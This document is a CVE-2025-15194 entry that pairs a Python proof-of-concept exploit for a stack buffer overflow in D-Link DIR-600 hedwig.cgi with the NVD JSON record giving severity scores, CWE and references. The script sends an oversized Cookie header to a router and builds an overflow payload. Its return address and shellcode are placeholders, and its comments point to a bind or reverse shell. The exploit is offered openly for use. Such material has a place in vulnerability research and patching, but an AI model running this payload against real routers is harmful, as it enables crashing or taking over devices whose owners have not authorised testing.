CVE-2025-15194

#!/usr/bin/env python3 """ CVE-2025-15194 PoC - D-Link DIR-600 hedwig.cgi Stack Buffer Overflow Note: This PoC is for educational and authorized testing purposes only. """ import requests import sys TARGET_IP = "192.168.0.1" # Default D-Link router IP TARGET_PORT = 80 TARGET_URL = f"http://{TARGET_IP}:{TARGET_PORT}/hedwig.cgi" def create_exploit_payload(): """ Generate malicious Cookie header to trigger buffer overflow. The payload structure: - Padding to overflow the buffer - Return address overwrite (ROP gadget address) - Shellcode or additional ROP chain """ # Buffer size in hedwig.cgi (adjust based on target firmware) buffer_size = 1024 # Padding to fill the buffer padding = b'A' * buffer_size # Overwrite return address (example ROP gadget) # In real exploit, this would be an address pointing to pop;ret gadget return_addr = b'\xaa\xbb\xcc\xdd' # Placeholder - need to find actual gadget # NOP sled for reliability nop_sled = b'\x90' * 64 # Shellcode for MIPS architecture (D-Link router CPU) # This is a placeholder - actual shellcode would execute bind shell or reverse shell shellcode = b'\x00\x00\x00\x00' # Placeholder shellcode payload = padding + return_addr + nop_sled + shellcode return payload def check_vulnerability(target_ip): """Check if target is vulnerable by sending oversized Cookie header.""" print(f"[*] Testing CVE-2025-15194 on {target_ip}") # Create malicious Cookie header evil_cookie = f"uid=1; " + "A" * 2000 # Oversized value to trigger overflow headers = { 'Cookie': evil_cookie, 'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-15194-Test)', 'Content-Type': 'application/x-www-form-urlencoded' } try: response = requests.get(TARGET_URL, headers=headers, timeout=5) print(f"[+] Response received: Status {response.status_code}") return True except requests.exceptions.Timeout: print("[!] Request timed out - possible successful exploitation") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) > 1: TARGET_IP = sys.argv[1] print("=" * 60) print("CVE-2025-15194 PoC - D-Link DIR-600 hedwig.cgi") print("Stack-Based Buffer Overflow Vulnerability") print("=" * 60) check_vulnerability(TARGET_IP)

{"cve": {"id": "CVE-2025-15194", "sourceIdentifier": "[email protected]", "published": "2025-12-29T16:15:41.890", "lastModified": "2026-01-13T21:11:47.320", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A vulnerability was found in D-Link DIR-600 up to 2.15WWb02. Affected by this vulnerability is an unknown functionality of the file hedwig.cgi of the component HTTP Header Handler. The manipulation of the argument Cookie results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been made public and could be used. This vulnerability only affects products that are no longer supported by the maintainer."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "baseScore": 10.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-600_firmware:2.15ww:*:*:*:*:*:*:*", "matchCriteriaId": "2D683DE8-8020-4802-A728-0FB275BEA980"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-600:b2:*:*:*:*:*:*:*", "matchCriteriaId": "E0A89A7C-E83E-41E8-9F6A-F7641F438AC1"}]}]}], "references": [{"url": "https://github.com/LonTan0/CVE/blob/main/Stack-Based%20Buffer%20Overflow%20Vulnerability%20in%20hedwig.cgi%20of%20D-Link%20DIR-600.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/LonTan0/CVE/blob/main/Stack-Based%20Buffer%20Overflow%20Vulnerability%20in%20hedwig.cgi%20of%20D-Link%20DIR-600.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338581", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338581", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.724404", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.dlink.com/", "source": "[email protected]", "tags": ["Product"]}]}}